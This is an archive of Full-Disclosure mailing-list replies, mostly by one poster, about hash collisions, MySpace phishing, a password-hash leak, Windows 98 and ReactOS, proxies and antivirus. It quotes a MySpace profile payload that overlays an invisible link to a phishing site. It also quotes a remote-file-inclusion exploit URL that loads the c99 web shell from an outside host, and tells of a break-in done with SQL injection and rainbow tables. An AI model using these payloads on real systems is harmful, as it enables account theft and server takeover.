the hi5 Antiphishing Departement ( http://antiphishing.hi5.com ).

Full blog post is available here:
http://mybeni.rootzilla.de/mybeNi/2007/hi5_antiphishing_departement/

--
benjamin beNi flesch
mybeNi websecurity - http://mybeNi.rootzilla.de/mybeNi

(coolest guy in da hood)


Re: [Full-disclosure] Chinese Professor Cracks Fifth Data Security Algorithm (SHA-1)

2007-03-24 Thread wac

Of course not, it is enough to find a collision and you'll get for example a
message signed by somebody else that looks completely authentic since
signatures encrypt that hash with the private key.

On 3/21/07, Blue Boar [EMAIL PROTECTED] wrote:


3APA3A wrote:
 First,  by  reading  'crack'  I thought lady can recover full message by
 its signature. After careful reading she can bruteforce collisions 2000
 times faster.

Cracking a hash would never mean recovering the full original message,
except for possibly messages that were smaller than the number of bits
in the hash value. There are an infinite number of messages that all
hash to the same value.

The best crack you can have for a hash is to be able collide with an
existing hash value and be able to choose most of the message contents.

BB


Re: [Full-disclosure] Wikipedia and Pedophilia

2007-01-23 Thread wac

On 1/20/07, Timo Schoeler [EMAIL PROTECTED] wrote:


In epistula a V Vendetta [EMAIL PROTECTED] die horaque Fri, 19
Jan 2007 13:29:53 -0800 (PST):

 Full Dislosure: Wikipedia

(...)

 Also, I apologize for my english - as it is only my second language.

 The Wikipedia ideology is like communism - all the people working
 together in harmony - it sounds like... Peace.  It's idealism at its
 highest level.


no, the wikipedia ideology is NOT like communism. i even doubt they
have something like an ideology.

however, you should also apologize for your ranting about something
(communism) you don't even know the basics of (i.e., its definition).

your superior system of capitalism has been destroying the planet for a long
time now. at least, we're getting at an end as climate change (carbon
dioxide, methane, etc.) leads to mass extinctions within the next two
decades (at a maximum) due to 'the weather being reconfigured around
the planet'.



I believe that doesn't have anything to do with capitalism or whatever
social system. It is about not using the right development politics, that's
quite different.

so in future those who cause this won't be able to satisfy their needs

on burgers, hot dogs etc., thus not being able to drive their SUVs.
nature will win :)



You wanna be natural? Fine, dress yourself with some animal skins (or maybe
stay naked), do not take baths, do not shave yourself and live till you get 30
years in a cave eating roots you find somewhere or jeje killing animals and
you will be quite natural. Ahh and forget about internet and computers
because in the first place you won't have electricity, that is quite
artificial. Ahh and forget about medicines, they are man made.

most interesting, alas Cuba is on its way to communism (no, it is no

communism there, this is socialism, the first step to)



Sure they are doing quite well. I believe you are talking about something
you don't know. Have you ever been there? Because I have.

is the only

country with sustainable development (*although* the US put an embargo
on them *decades* ago):



And you still believe those lies from the government? Ahh come on, you eat
the cake. Have you ever heard of some government that doesn't twist the truth?

http://www.panda.org/news_facts/publications/key_publications/living_planet_report/index.cfm


capitalism is about exponential, endless growth;



I believe that's the natural way of growing things. After all that's what
civilization is about, otherwise we would be only small tribes trying not to
die of hunger instead of having a society.

the physician will say

that this is not possible because the universe is not endless.



Hmm I believe you have to read some more about that. Anyway in case it is
not infinite it is so huge (I believe you still don't understand how much, it
is like our entire galaxy is a little grain of sand on a beach, in fact less
than that) that you can assume it is for the next hmm... billions of billions
of years to come. And that thing they say about energy and oil... Jaj the
Sun is there wasting millions of megawatts every second throwing them to
space and you all talk about some stupid oil or carbon that is going to
reach its end by some X year instead of putting all of your efforts into
finding ways to get that energy shining in front of your face. And then if
the Sun becomes dead some day then there are billions of other stars out
there. As Einstein said, there are two infinite things, the universe and
human stupidity. So in my opinion it is a very stupid idea, that one of
stopping development with such excuses.

the

doctor will tell you that the only thing that achieves this is:
cancer. (which, as capitalism, is its own murderer :)


(...)

 V

haef phun,

t. - at least anticapitalist and still waiting for a _single_
democracy that works as the definition says.


Re: [Full-disclosure] Grab a myspace credential

2007-01-16 Thread wac

On 1/16/07, Deepan [EMAIL PROTECTED] wrote:


On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote:
 but at some point all this abuse will likely start sending users off
 to another service. 

 that's only -- if they know they are being abused.. most of them are
 not coherent about any such issues..



 On 1/15/07, Kevin Pawloski [EMAIL PROTECTED] wrote:
 The level of phishing sites targeting MySpace and bot related
It is not quite easy to fool 56000+ users using phishing sites. I wonder
how Mark is doing it.




Hmm... Oh no, it is very easy, yes very easy what he is doing. He left some
traces on some of the cracked accounts. I was expecting somebody to
comment earlier since it has been a couple of hours since the initial post.

When you modify a profile you can add this to the data of the profile, you
know those HTML customizations. I found this on one of the accounts that
really got my attention a little bit more than the girl of the account :P

HOLA<a style="text-decoration:none;position: absolute;top:1px;left:1px;"
href="http://marcolano.com/login/"><img
style="border-width:0px;width:2024px; height:1768px;"
src="http://x.myspace.com/images/clear.gif"></a><a
style="text-decoration:none;position: absolute;top:1px;left:1px;"
href="http://marcolano.com/login/"><img style="border-width:0px;width:2024px;
height:1768px;" src="http://x.myspace.com/images/clear.gif"></a><embed
allowScriptAccess="never" allowNetworking="internal" enableJSURL="false"
enableHREF="false" saveEmbedTags="true"
src="http://www.../mov/cid_3277_f.mov" width="1" height="1">

As you might see, this creates a huge invisible link in the page in front of
everything, so when you click on anything on the page like a link or
anything it will take you to that phishing website so ppl believe that the
account expired and enter their user+pass. Now I believe that his message
was a way to tell about a BUG in myspace that should filter that content and
it is not doing it. So... we are in fact not talking about a stupid phishing
website for those who still believe that.

Regards
Waldo



 activity that has been targeting MySpace lately is pretty
 alarming. Granted there is no real financial risk if an
 account gets compromised for the user but at some point all
 this abuse will likely start sending users off to another
 service.

 Kevin


 On 1/15/07, North, Quinn [EMAIL PROTECTED] wrote:
 [EMAIL PROTECTED]
:doyouhonestlythinkiwillputmyrealpass
 wordhere

 ...at least there is some hope left in the world :-\

 --=Q=--

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On
 Behalf Of Emma
 Perdue
 Sent: Monday, January 15, 2007 7:48 AM
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] Grab a myspace credential

 56000+ and counting

 http://www.marcolano.com/login/myspace.txt

 --
 *Emma aka TINK*




--
---
Regards
Deepan Chakravarthy N
http://www.codeshepherd.com/
http://sudoku-solver.net/

I am a programmer by day,
I dig grave for other programmers by night.


Re: [Full-disclosure] Flog 1.1.2 Remote Admin Password Disclosure

2007-01-15 Thread wac

On 1/8/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:


On Sun, 07 Jan 2007 16:08:23 +0100, endrazine said:

  yes that's correct but don't forget that hashes can collide
 
  it could be the case that:
 
 can ? could ? might ? Do you have any mathematical proof or are you
 just guessing ?

It's a pretty easy proof actually.  If your password input routine allows
more different passwords than there are possible hashes, you *will* have
collisions.  For instance, if you use a 64-bit hash, and reasonable-length
passwords, you can create more than 2**64 of them, and 2 *have* to
collide.



right


 xhash("$Up3$tr0n9 # [EMAIL PROTECTED]") == xhash("1234") and you don't even
  need the original strong one ;)
 what hashing algorithm is being used ? Is a collision realistic ? How
 much time would it take to actually break a given hash ?

If you're using anything resembling a sane hash (such as MD5 or similar),
what happens is that you basically ignore the hash collisions - because
rather than 1234, your colliding password/phrase is probably a 32-byte or so
string, which is likely not even enterable at the keyboard (it ends up being
"A # ctl-b 9 e alt-control-meta-$ etcetc" - of the 32, likely only 10 or so
of the characters are from the 96-char printable ASCII set, and there's a good
chance that at least several of the bytes are ones you can't enter from the
keyboard at all)



Well I think you should not ignore those collisions, in some cases binary
data could be entered as a password, for example when sent over the network,
so... do not count on having to type it on a keyboard, machines can do that
for you ;).

BTW for those who still do not believe this bug is a BIG hole well... as an
example a friend of mine broke into a website about 2 days ago reversing
an MD5 hash. Using a similar bug in one of those php instant website
creation tools that disclosed the administrator password hash using some
sort of SQL injection. He was using a program similar to John the Ripper and
asked me for help since that was taking very long and he had no idea about
rainbow tables. I simply told him to use one of those online Rainbow tables
and the thing ended up taking only a couple of minutes. And he was only learning
about SQL injection and it was only one hash that popped when you typed in your
browser some sort of URL containing that SQL stuff. Now imagine when you have
the whole database. No... it is not BIG, it is HUGE.





Re: [Full-disclosure] Flog 1.1.2 Remote Admin Password Disclosure

2007-01-07 Thread wac

On 1/5/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:


On Fri, 05 Jan 2007 15:34:49 EST, T Biehn said:
 This isn't a password disclosure, it's a leak of password information.

 It's a password hash, you super hacker.

And given the hash, and knowledge of how the hash is computed, it becomes
possible to dictionary-attack (and other related techniques), and thus
get the actual passwords, unless there are other things in place to ensure
that all users have passwords sufficiently strong to resist those
techniques.



yes that's correct but don't forget that hashes can collide

it could be the case that:

xhash("$Up3$tr0n9 # [EMAIL PROTECTED]") == xhash("1234") and you don't even need
the original strong one ;)

so a strong password is not a countermeasure to that

I believe that is a BIG security hole

Regards
Waldo

And given that this:


 http://remote_server/data/users.0.dat

works, the probability that the hashes represent strong passwords is quite
close to nil.

In any *practical* sense, the fact that the attacker can get the hash and
from that extract/compute at least some passwords means that the passwords
are *effectively* disclosed, even if the actual bitstring originally retrieved
isn't the actual password.







Re: [Full-disclosure] Vuln ....

2006-10-18 Thread wac
Thanks. But don't worry I won't read sh... anyway :) Nothing interesting could
come from that hitman anyway.

Regards
WAC

On 10/16/06, Pink Hat [EMAIL PROTECTED] wrote:

On 10/16/06, wac [EMAIL PROTECTED] wrote:
 Hey you could start by writing those sites in english :P

http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com&langpair=ar%7Cen&hl=en&ie=UTF8

Not perfect but readable... I guess...

Re: [Full-disclosure] Vuln ....

2006-10-16 Thread wac
Hey you could start by writing those sites in english :P

On 10/13/06, hitham hitham [EMAIL PROTECTED] wrote:

===
# Found By Sp1deR_NeT ..
# E-mail :- [EMAIL PROTECTED]
# Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com
# We Are :- PalEstineHackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )
*Script :- PHP rojekt5.1.1
-
Code Vuln :-
$include_path = $path_pre.'lib/lib.inc.php';
include_once($include_path)
In File :- editor_big.php
-
Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?
Example :-
www.sitename.com/[path]/lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?
-
[EMAIL PROTECTED]
Sp1deR_NeT  ^__^
===


Re: [Full-disclosure] Server Redundancy

2006-08-12 Thread wac
Hi:

Thanks I'll check ipvs.

Regards
Waldo

On 8/10/06, Tim Hecktor [EMAIL PROTECTED] wrote:

Hello,

 Isn't there a way to map a name to several IPs? Or use aliases?

Maybe this is what you are looking for:

pandora:~# dig ftp.freenet.de

; <<>> DiG 9.2.1 <<>> ftp.freenet.de
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59136
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 3, ADDITIONAL: 3

;; QUESTION SECTION:
;ftp.freenet.de.                IN      A

;; ANSWER SECTION:
ftp.freenet.de.         1457    IN      CNAME   ftp-0.freenet.de.
ftp-0.freenet.de.       600     IN      A       194.97.2.69
ftp-0.freenet.de.       600     IN      A       194.97.2.70
ftp-0.freenet.de.       600     IN      A       194.97.2.67
ftp-0.freenet.de.       600     IN      A       194.97.2.68

This will map a name to more than one ip and will give you
load-balancing this way, but not real redundancy.
To map a service to different hosts redundantly you can use a
box running ipvs. This box can be made redundant with an identical box using
mon and heartbeat to do ip failover.

Best regards,

Tim Hecktor



Re: [Full-disclosure] Server Redundancy

2006-08-10 Thread wac
Hi:

Isn't there a way to map a name to several IPs? Or use aliases? I'm interested
in the subject because I want to do the same thing.

Regards
Waldo

On 8/9/06, Gary E. Miller [EMAIL PROTECTED] wrote:

Yo Sec!

On Wed, 9 Aug 2006, Sec Bas wrote:

 I was thinking about doing this with Dynamic DNS and using rsync to
 replicate changes.

Dynamic DNS will not provide the response you are looking for. Many
browsers cache DNS for 30 mins or more regardless of your TTL. Many
ISPs cache DNS for a day or two regardless of your TTL. My experience
is that it takes up to 2 days before a DNS change fully propagates even
with a TTL of 5 mins. In some pathological cases I have seen it take 6
months.

RGDS
GARY
---
Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701
[EMAIL PROTECTED] Tel:+1(541)382-8588

Re: [Full-disclosure] Gmail emails issue

2006-08-05 Thread wac
Hi:

Worried about a temp file in gmail servers and not by the fact that using a
browser your mails go through who knows which server in plain text? Except for
the login part that uses SSL of course. Somebody could be sniffing :D

regards
WAC

On 8/4/06, 6ackpace [EMAIL PROTECTED] wrote:
Hi All,

Gmail stores mails in a Temp folder for faster access, but I have observed it
fails to remove mail from the temp files after the session is ended.

any user who has physical access to the system can read mail and contact
information of the Gmail user.

Discloses information which is private and confidential?

thank you

ratna



Re: [Full-disclosure] 70 million computers are using Windows 98 right now

2006-08-03 Thread wac
On 8/1/06, Eliah Kagan [EMAIL PROTECTED] wrote:
On 7/27/06, wac wrote:

 Now, Linux is definitely not a natural migration pathway. That theory of
 adapting server oriented operating systems to the desktop, and the belief
 that it was going to be a success, has proven to be wrong.

Really? Windows 2000, Windows XP, and Mac OS X seem to work pretty
well for novice users...

Sorry I don't get the point here.

Or are you belaboring the misguided claim that Linux is fundamentally
a server-based system but that Windows NT is not?

There was Windows NT workstation ;). With windows it was the other way. From
desktop to server. Of course you can change Linux so much that it won't be
Linux anymore. Definitely putting an X server on top of unix won't make it
ready for desktop, that's a fact.

Are you honestly claiming that Windows NT Server has a nonintuitive
user interface and yet Windows NT Workstation has an intuitive user
interface? (Or was that a joke?) They are the same operating system
except for additional executables and registry tweaks.

Of course not, they are almost the same. Hey! take a look at winNT 4.0
resources in explorer, some bitmaps say windows NT server, workstation and
there was a 3rd one, I don't remember very well. I don't even consider
windows OS server oriented at all (that is why I mentioned the workstation
thing if interested). I can say then something similar. Adapting desktop
oriented OS to server ... And yes numbers prove that. Anyway I guess it is a
problem of selling more or having it installed on more computers. But then
that's not my problem. Mine and many others' are having their problems
solved. And yes I can tell you a couple of stories about that. I have some
windows servers. And guess what. I'm praying for a linux/freebsd or whatever
*nix you can name. But then the persons across the sea just can't install
that. Then I guess that would give you an answer about the installer
interfaces you talk about later. No, they just can't install a Linux at all,
and believe me, I tried hard to make that happen. Imagine a FreeBSD or
something else. My only chances would have been for example to use some
virtualization software and install the other OS in some partition and then
pray that a boot loader installer from windows would wake up correctly the
other OS. As you can see that was a big IF we were not ready to take. Anyway
I was left without choices and now the software those servers run had to be
built on top of Windows. Well I/O completion ports work OK as long as the
non paged pool doesn't drain out when the number of opened sockets goes too
high. Yes even with the registry hack to increase its size. Also the use of
windows for example included having to install a commercial SSH software
instead of OpenSSH (no the cygwin port was not ok, it hanged the server
sometimes because its emulation created a process for every user logged
in). Ohh yes we are talking about real money here. Believe me I really
prayed for a damn good user friendly installer once.

When you said "server-based" I thought you meant "designed for enterprise
client-server situations". If you mean "designed to be used exclusively on
a dedicated server box operated by a technically learned network
administrator" then (by definition) no general purpose operating system (be
it Windows, Linux, FreeBSD, OpenBSD, NetBSD, or any other) is server-based.
Saying that noobs can't use Linux doesn't make it so. FreeBSD is a
particular general purpose operating system that is perhaps almost
exclusively used by people who know well what they are doing (or are
willing to put in the time and effort to learn)--and Mac OS X is based on
FreeBSD. (To be fair, some elements are based on NeXTstep, which is another
operating system used almost exclusively by the technically inclined.)

This notion that you can't take an operating system that has been
traditionally hard to use and make it easier is senselessly defeatist and
unsupported by evidence, though it may be partially self-fulfilling.

Ok where is that evidence? MacOS X is not a good example when you have
little choices you can make. What would you install in a mac instead? Linux?
Then I guess we have the same situation here. But also keep in mind that the
only thing that Mac OS X got from freebsd was the kernel. Anyway I'm not an
expert here so I guess that I can't talk very much about the subject. So far
I see that Windows is more used on the desktop than any other OS and yet you
have to pay for the license (or violate it) and all the rest of the sh.. we
all know. And now some Macs have intel inside. Are we going to see Apple
selling Wintel too in the future? Maybe, when they realize that they are
probably going to sell more computers.

As an aside, if you're saying that Windows NT is even based on Windows
9x, I would take argument with this.

This is a claim I never made.

Would you say that OS/2 is based on Windows 9x?

Of course not. It was based somehow in MS-DOS. It was supposed to be the
successor of that one. But then M$ dropped

Re: [Full-disclosure] 70 million computers are using Windows 98 right now

2006-07-27 Thread wac
On 7/26/06, Eliah Kagan [EMAIL PROTECTED] wrote:
> Waldo--
>
> > It will run everything (almost) that runs on top of a win32 subsystem... (the top bar is higher actually, it goes for native Java, native Linux, native DOS, OS/2 etc.. is a long list) and drivers as well, enough for migration ;). Anyway you take it if you want, is free to try :D.
>
> It aims to run everything that runs on top of a win32 subsystem and more, and it will probably succeed. I am very happy about the ReactOS project--but I think it's important to realize the difference between what an OS will be and what it is now. In the context of security, Windows 98's developers are no longer committed to security for Windows 98 (even to the degree to which they were before), and ReactOS's developers *cannot* be committed to security for ReactOS because ReactOS is not stable--i.e. the developers do not classify it as stable, i.e. the developers are perfectly willing to have bad, insecure code in the system for an extended period of time if doing so is most conducive to development.
>
> > It is even smaller than 98 and will work with 32 Mb of RAM (maybe less in the future, some ppl are already testing at 8 MB hey that's better than even win 95 and is a full NT Box WOW I believe M$ make some millions to spend a couple of dollars in memory chips!!).
>
> It was really, really small the day before the first line of code was written. It was pretty small after the first hundred lines of code were written. In its still incomplete state, it is no surprise that it is still smaller than a complete operating system to which it eventually is slated to contain comparable functionality in most or all areas.

It is more complete than incomplete ;) If someone can ever say that a software is complete. But certainly there is not much missing. I would say that it is about 70-80 %. Of course what's left are the hardest parts, because Windows being so closed there are still many obscure points that need to be clarified.

> I may be misremembering, but I'm pretty sure that my old 75MHz P1 no-MMX Packard Bell box had 8MB of RAM when I put Windows 98 on it (due to the other 8MB not being properly seated in the RAM slots at the factory...ah Packard Bell, brings back memories...). Windows 98 crashed a lot, but it didn't crash any more often than I've heard it crashes on just about any box, due to it being Windows 98.
>
> What is cool is that ReactOS can be run, more or less, with 8MB of RAM, and ReactOS is an *NT* style system--I wouldn't attempt that with Windows NT 4.0. I've never used any version of NT before 4.0, and I don't know what their memory footprints were. Perhaps they were less.

I believe you can wake up NT 4.0 with a minimum of 16 Mb. I could give it a try with some virtualization software to figure it out but it is not one of my priorities right now. Anyway it will run on a machine where Windows 98 runs. Its hardware requirements are equal or lower.

> > Today Linux distros take 128 Mb or more to run decently. So IMHO it is a replacement candidate for some situations already.
>
> You have a good point--it may be a reasonable replacement candidate for Windows 95/98/ME systems **where a guarantee of security being a priority, from the vendor, is not required**. This implies that the user knows enough about security to manage the risk that the vendor is not managing. A guarantee of security from the vendor may not translate into actual security, but it does translate into security professionals getting pissed off and vocal when actual security is not delivered.
>
> I doubt ReactOS is a good replacement candidate for a Linux system--if memory is the primary concern, OpenBSD or a small Debian system with the kernel rebuilt sans unnecessary code would be a better option. If a working Linux or other POSIX-like API is implemented as a subsystem then it might be a reasonable replacement for Linux and/or other *nix systems.

No, of course not. Not even a fully working Windows is a replacement at all for Linux in most situations. Anyway if we put Linux+Wine+ndiswrapper the memory footprint of that configuration is probably high. You could be right here, I have not seen the memory requirements of those configurations.

> > Now, Linux is definitely not a natural migration pathway. That theory of adapting server oriented operating systems to the desktop, and believing it was going to be a success, has proven to be wrong.
>
> Really? Windows 2000, Windows XP, and Mac OS X seem to work pretty well for novice users...

Sorry I don't get the point here.

> Or are you belaboring the misguided claim that Linux is fundamentally a server-based system but that Windows NT is not?

There was Windows NT Workstation ;). With Windows it was the other way. From desktop to server. Of course you can change Linux so much that it won't be Linux anymore. Definitely putting an X server on top of Unix won't make it ready for the desktop, that's a fact.

> > I wonder if my parents will manage someday to even install it :D. (yes I'm making a constructive criticism here)
>
> Have them install

Re: [Full-disclosure] 70 million computers are using Windows 98 right now

2006-07-22 Thread wac
On 7/11/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

> On Tue, 11 Jul 2006 13:28:08 -0300, Cardoso said:
>
> > but I agree. Let them die. 98 is a very unsafe platform, hope the spyware guys act fast and kill all the remaining machines, under a ton of popups.
>
> And where does that leave the users? Have you considered that maybe some of them are still using Win98 because they don't have a realistic upgrade path? WinXP may not install on their box, or run adequately - and just telling them to upgrade isn't always an option. There's large parts of the world where a discarded box running Win98 is affordable, but a new box and a legal copy of XP is just out of the question.
>
> Phrased differently - how would *you* feel if *your* platform was the target of the sort of attack you're advocating against Win98?

I would use ReactOS in that case ;) --- www.reactos.com The alpha 0.3.0 rc1 is already there waiting for download, yep an alpha, but then that is what win98 always was, a badly designed alpha put on the market in a rush to produce money at the expense of a lot of data destruction. Fortunately later M$ paid that with some degree of credibility loss. Anyway if an alpha is not enough for you then MAKE IT BETA ;) you have the source code ready to play with.

Regards
Waldo

Re: [Full-disclosure] Vunerability in yahoo webmail.

2006-06-14 Thread wac
Hi folks:

Can I get this file somewhere else? Like a web site or something. This gmail thing detects it as a virus. I doubt Yahoo will let it pass still, that's why I don't ask anyone to send it to me ;). I wonder who asked to have a stupid scanner in the e-mail that you can't disable. I don't even have one on my computer!!! Anyway I understand I'm not a common kind of people ;). Thanx in advance.

Waldo

On 6/12/06, David Loyall [EMAIL PROTECTED] wrote:

> Hello, all.
>
> I just received an email with an html attachment, on a yahoo account. When I opened the mail, yahoo automatically displayed the html, and executed the code within. What the hell. =)
>
> It forwarded the message to my contacts list, (or some other set of addresses, dunno,) and redirected my browser to a website.
>
> I'm off to a BBQ, and I don't care about yahoo. So I'm not even going to read the code and see how this happens. I'm attaching the html file as a text file. Enjoy!
>
> Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up, and encourage them to close the hole, that'd be wonderful.
>
> Cheers,
> --David Loyall
> Omaha, Nebraska

Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-28 Thread wac
Jejej no way, that would be the only thing that would make me remove the bookmark from my browser. Anyway there are a couple of other sites that give those files for free so we won't lose anything :D We'll simply change the provider.

Regards
Waldo

On 3/16/06, Ivan . [EMAIL PROTECTED] wrote:

> http://www.eweek.com/article2/0,1895,1938511,00.asp

Re: [Full-disclosure] Phun! Search

2006-03-23 Thread wac
LOL jajajajajaj

On 3/21/06, Javor Ninov [EMAIL PROTECTED] wrote:

> i hope you soon reach 18 and start thinking about sex... you will like it i am sure
>
> n3td3v wrote:
>
> > \/\/3 53nd j00 m4d c0d35 ch3x j00r 1nb0x3r ph0r Xpl01t c0d3 2 m4n1pul4t3 phUN! s34rch h0h0h0
> >
> > On 3/21/06, *teh kids* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote:
> >
> > > G00d W0Rk, i7 533m5 tHaT u ArE pu77ing Y0Ur 3x7r@ ChR0M050M3 70 g00D u53 XxX
> > >
> > > On 3/21/06, n3td3v [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote:
> > >
> > > > Vendor: Yahoo! Inc.
> > > > Service: Yahoo! Search.
> > > > Description: Phun! Search indexes millions of documents, including its own user accounts.
> > > > Concept: http://66.218.69.11/search/cache?ei=UTF-8p=n3td3vfr=sfpu=mtf.news.yahoo.com/mailto%3Furl%3Dhttp%253A//e.my.yahoo.com/config/cstore%253F.opt%3Dcontent%2526.node%3D1%2526.sid%3D171771%26title%3DChoose+Content%26prop%3Dmycstore%26locale%3Dus%26h1%3Dymessenger+at+Yahoo%21+Groups%26h2%3Dn3td3v%26h3%3Dhttp%253A//my.yahoo.comw=n3td3vd=U5wy1m1aMbOeicp=1.intl=us
> > > > Remark: Yahoo! is not affiliated with the authors of this page or responsible for its content. :-)
> > > > Thank: n3td3v.
> > > > Greet: Yahoo! core security team.

Re: [Full-disclosure] Is this a Virus?

2005-12-31 Thread wac
On 12/29/05, Shawn Cox [EMAIL PROTECTED] wrote:

> I doubt it's a virus. Filling up a hard-disk is counter
> productive to propagation. Though I do think it was an
> option in the VCL of old.


Hi:

Well if the virus releases the space before infection, it can be
productive to the propagation since it would reserve that space you
won't be able to fill with other data ;).

Generally it is easy to detect a virus. Feed your computer with a couple
of fresh executables, and some will come out modified with high
probability and most times with the size increased. Warning: there are
slow viruses that take their time to reproduce, and usually last years
before somebody even notices. However this is not very usual; generally
viruses eat whatever you give them, except some with bait detection.
Most check baits for the size, and some do more advanced thingies like
analyzing the file for known routines in high level languages or
variations in the instructions. If interested I have a lot of
literature around and a huge 5000+ virus collection built over the
years. Some are still on schedule for reversing but if anyone is
interested just gimme a call, it would be great to save myself some time.

Regards
Waldo Alvarez

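The bait-file heuristic from Waldo's post, worked through as an added example (not code from the post): a baseline of size and SHA-256 is taken for a set of bait executables and re-checked later. The constructed demo tampers with two dummy files itself to show the size-growth case and, separately, why a size-only bait check misses an in-place change.

```python
import hashlib
import os
import tempfile
from dataclasses import dataclass


@dataclass(frozen=True)
class BaitRecord:
    """What we remember about each bait file at baseline time."""
    size: int
    sha256: str


def fingerprint(path):
    """Size plus SHA-256 of a file; the hash catches changes the size cannot."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return BaitRecord(os.path.getsize(path), h.hexdigest())


def baseline(paths):
    """Record every bait file right after it was placed, before any use."""
    return {p: fingerprint(p) for p in paths}


def check_baits(baseline_map):
    """Re-fingerprint each bait and report the ones that no longer match.

    Returns a list of (path, verdict) pairs; untouched baits are omitted."""
    findings = []
    for path, before in baseline_map.items():
        if not os.path.exists(path):
            findings.append((path, "missing"))
            continue
        after = fingerprint(path)
        if after == before:
            continue
        if after.size > before.size:
            findings.append((path, "modified, grew by %d bytes" % (after.size - before.size)))
        else:
            # Same (or smaller) size but a different hash: a size-only bait
            # check, which the post says most checks are, would miss this.
            findings.append((path, "modified, same or smaller size"))
    return findings


def demo():
    """Constructed scenario: three dummy baits, two of them tampered with
    by this demo after the baseline was taken. Returns {basename: verdict or None}."""
    with tempfile.TemporaryDirectory() as d:
        paths = [os.path.join(d, "bait%d.exe" % i) for i in range(3)]
        for p in paths:
            with open(p, "wb") as f:
                # dummy content, not a real executable
                f.write(b"MZ" + bytes(range(256)) * 4)
        base = baseline(paths)
        # bait0 gets 512 bytes appended: the size-growth case the post describes
        with open(paths[0], "ab") as f:
            f.write(b"X" * 512)
        # bait1 is changed in place, so its size stays the same
        with open(paths[1], "r+b") as f:
            f.seek(100)
            f.write(b"\x00" * 16)
        # bait2 is left alone
        findings = dict(check_baits(base))
        return {os.path.basename(p): findings.get(p) for p in paths}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, "->", verdict or "unchanged")
```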


Re: [Full-disclosure] Good proxy chaining applications

2005-12-31 Thread wac
Hi:

You can use OpenSSH in one of the machines, plink (command line client
that comes with PuTTY), and freecaps ( http://www.freecaps.ru ) if you
want a completely free system. But instead of freecaps you can use
Proxifier (www.proxifier.com) that works better, although Proxifier
sometimes has to be killed forcibly with the task manager
because sometimes it becomes somehow idle in the background, blocking all
the outgoing connections.

Regards
Waldo Alvarez

On 12/30/05, pagvac [EMAIL PROTECTED] wrote:

> Happy holidays to everyone who is subscribed to the list!
>
> I'm interested in getting opinions from people that have experience using proxy chaining applications. Please, don't tell me to use Google. I've done so already! I *don't* want a compiled list of proxy chaining applications but rather advice from people that *have* actually used them.
>
> I've been playing with SocksChain [www.ufasoft.com/socks/] which supposedly allows you to choose the executable of your favorite browser (or any other app) and it will then sock it. In reality, my IP address was still showing [http://www.whatismyip.com/] after socking Firefox (probably I'm not doing something right).
>
> I welcome any comments on applications that provide privacy when surfing the web. I'm interested in applications that update a list of proxies automatically and will connect you to each of them. I'm talking about some sort of client like SocksChain that you can install on your desktop and will then do the job, rather than cgi proxies [http://www.freeproxy.ru/en/free_proxy/cgi-proxy.htm] or public lists [http://www.publicproxyservers.com/page1.html]
>
> Regards,
> pagvac
>
> --
> pagvac (Adrian Pastor)
> www.ikwt.com - In Knowledge We Trust

Re: [Full-disclosure] a call for full-disclosure to become a moderatedlist

2005-12-17 Thread wac
Hi:

I believe that such a moderated version should be given as an alternative
when people subscribe to this list. I mean in the webpage or in the
help mail. I also don't want this one to be moderated and I feel just
fine with the messages sent but if anyone wants it filtered... Well why
not, they have their rights and who knows, if some day I feel that I
need it maybe I'll switch. Who knows?

Regards
Waldo

On 12/16/05, James Longstreet [EMAIL PROTECTED] wrote:

> On Dec 16, 2005, at 5:55 PM, Michael Evanchik wrote:
>
> > I second this
>
> There's no point discussing it, or holding it to a vote. The purpose of this list is to be unmoderated. The list owner has stated over and over that that is the one point he will not concede on.
>
> Kurt Seifried, among others, runs a moderated version of this list. I can't vouch for its quality, since I'm not really interested in the list being moderated. If you want moderation, look elsewhere. If you don't want someone else moderating the list, learn about filters, or even your 'D' key.
>
> Calling for full-disclosure to be moderated is pointless and is wearing out my 'D' key.

Re: [Full-disclosure] McAfee VirusScan vs Metasploit Framework v2.x

2005-12-09 Thread wac
Hey guys I guess you are wasting so much time. It is very easy to just
encrypt some modules and enjoy McAfee or any other stupidly telling you
that the computer is clean. Period, do not waste your time with McAfee
or any other, it just takes 1 second. Poor world believing in antivirus.

Regards
Waldo

On 12/9/05, Morning Wood [EMAIL PROTECTED] wrote:

> // look, no top post !!!
>
> > Looks like some overzealous idiot at McAfee added Trojan signatures for 202 files in the latest version of the Metasploit Framework. If you use the Framework for your job and have a McAfee support contract, *please* call them and let them know that their product is incorrectly tagging a standard security tool as a Trojan and that this is interfering with your ability to conduct business.
>
> the external payloads ( such as vncdll.dll ), could be considered a possible malware threat but not the whole package. ( although i guess if kiddies can root your server, upload msf, launch msfweb, that would give you a remote attack platform... right ). Further, to include these sigs on a desktop product is just ignorant.
>
> mw

Re: [Full-disclosure] Window's O/S

2005-12-02 Thread wac
Hi:

I guess that is the remains of an old IE bug that opened notepad.exe
on the desktop. I remember it quite well, it is archived somewhere for
sure.

On 11/24/05, jacob jango [EMAIL PROTECTED] wrote:

> Not sure if you guys are aware of this issue in Windows XP...!! Create a folder on the desktop and name it notepad. Open Internet Explorer, go to view, source code: this will open the contents of the notepad folder!!

Re: [Full-disclosure] Is this a phishing attempt?

2005-08-27 Thread wac
